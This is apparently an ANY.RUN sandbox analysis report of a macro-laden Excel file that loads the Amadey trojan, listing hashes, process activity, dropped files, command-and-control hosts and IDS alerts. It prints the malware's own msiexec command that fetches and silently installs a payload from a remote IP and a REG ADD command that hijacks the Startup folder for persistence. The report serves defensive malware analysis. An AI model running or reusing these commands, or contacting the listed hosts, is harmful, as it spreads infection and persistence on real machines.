analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

d33fd4d91e78f4e4cda03703159bc37e.xls

Full analysis: https://app.any.run/tasks/a36b714c-bb10-47ca-bd9f-350157d9494e
Verdict: Malicious activity
Threats:

Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.

Analysis date: April 25, 2019, 05:48:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
exe-to-msi
trojan
amadey
ta505
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Wed Apr 24 13:57:37 2019, Security: 0
MD5:

D33FD4D91E78F4E4CDA03703159BC37E

SHA1:

D49232D4EB98B5730C895A5F3B1DCAEED89502F0

SHA256:

F7A615EB750B37C381B3D8A563A2D2A810659094E2548FDBA95CED82FA390707

SSDEEP:

3072:tKpb8rGYrMPelwhKmFV5xtezEsgrdgNeEQSNfzAKAn8CsEwF:tKpb8rGYrMPelwhKmFV5xtuEsgrdgNHZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • EXCEL.EXE (PID: 2316)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2316)
    • Changes the Startup folder

      • REG.exe (PID: 644)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2972)
    • Application was dropped or rewritten from another process

      • cmualrc.exe (PID: 2052)
    • Downloads executable files from IP

      • msiexec.exe (PID: 2972)
    • AMADEY was detected

      • cmualrc.exe (PID: 2052)
    • Connects to CnC server

      • cmualrc.exe (PID: 2052)
  • SUSPICIOUS

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2972)
    • Uses REG.EXE to modify Windows registry

      • cmualrc.exe (PID: 2052)
    • Executable content was dropped or overwritten

      • MSI3DB5.tmp (PID: 1668)
      • msiexec.exe (PID: 2972)
    • Creates files in the program directory

      • MSI3DB5.tmp (PID: 1668)
  • INFO

    • Application was dropped or rewritten from another process

      • MSI3DB5.tmp (PID: 1668)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2316)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2972)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 2972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

HeadingPairs:
  • Листы
  • 2
  • Макросы Excel 4.0
  • 2
TitleOfParts:
  • 4
  • OOOO
  • 2
  • 3
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
Company: Microsoft Corporation
CodePage: Windows Cyrillic
Security: None
ModifyDate: 2019:04:24 12:57:37
CreateDate: 2018:12:19 10:42:12
Software: Microsoft Excel
LastModifiedBy: 1
Author: Microsoft Office
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start excel.exe no specs msiexec.exe no specs msiexec.exe msi3db5.tmp #AMADEY cmualrc.exe reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
2316"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
1472msiexec.exe STOP=1 /i http://92.38.135.134/dom2 /q ksw='%TEMP%' C:\Windows\system32\msiexec.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2972C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1668"C:\Windows\Installer\MSI3DB5.tmp"C:\Windows\Installer\MSI3DB5.tmp
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2052c:\programdata\f64a428dfd\cmualrc.exec:\programdata\f64a428dfd\cmualrc.exe
MSI3DB5.tmp
User:
admin
Integrity Level:
MEDIUM
644REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\f64a428dfdC:\Windows\system32\REG.exe
cmualrc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
797
Read events
733
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
2
Text files
9
Unknown types
3

Dropped files

PID
Process
Filename
Type
2316EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR2DC4.tmp.cvr
MD5:
SHA256:
2972msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF44CBBCA2C0814569.TMP
MD5:
SHA256:
1668MSI3DB5.tmpC:\ProgramData\0
MD5:
SHA256:
1668MSI3DB5.tmpC:\programdata\f64a428dfd\cmualrc.exe:Zone.Identifier
MD5:
SHA256:
2972msiexec.exeC:\Config.Msi\113caa.rbs
MD5:
SHA256:
2052cmualrc.exeC:\ProgramData\0
MD5:
SHA256:
2972msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFF175C4BB6BF90BAD.TMP
MD5:
SHA256:
2972msiexec.exeC:\Windows\Installer\MSI3CF7.tmpbinary
MD5:968DF399032682E94426A272FCA2D489
SHA256:FE9B9AB9C153D3D41464521E6FF2F3D56ADB64C4FCC7464E0AB177EC1102BE92
2972msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:4EE248801305147E6B0AB806300B6FC2
SHA256:3DFB560EA9F95725B1E450A528A050905FCE79A0CD4731B14C3F14494ED319A1
2972msiexec.exeC:\Windows\Installer\MSI38D0.tmpexecutable
MD5:78985160BDA86130570CAFEB6F7FCDDA
SHA256:6389E82E1674E56D006C2C58E36641DB661C35EBA3A7A418E5577C71497459DC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2972
msiexec.exe
GET
200
92.38.135.134:80
http://92.38.135.134/dom2
RU
executable
172 Kb
suspicious
2052
cmualrc.exe
POST
200
89.45.19.24:80
http://gohaiendo.com/ppk/index.php
RO
text
6 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2052
cmualrc.exe
89.45.19.24:80
gohaiendo.com
Real Network and Tel SRL
RO
suspicious
2972
msiexec.exe
92.38.135.134:80
RU
suspicious

DNS requests

Domain
IP
Reputation
gohaiendo.com
  • 89.45.19.24
  • 95.140.195.178
  • 62.141.241.11
  • 181.197.131.40
  • 109.166.208.203
  • 200.91.115.40
  • 91.201.175.46
  • 84.54.187.24
  • 213.164.242.16
  • 186.74.208.84
malicious

Threats

PID
Process
Class
Message
2972
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
2972
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
2052
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
2052
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
2 ETPRO signatures available at the full report
No debug info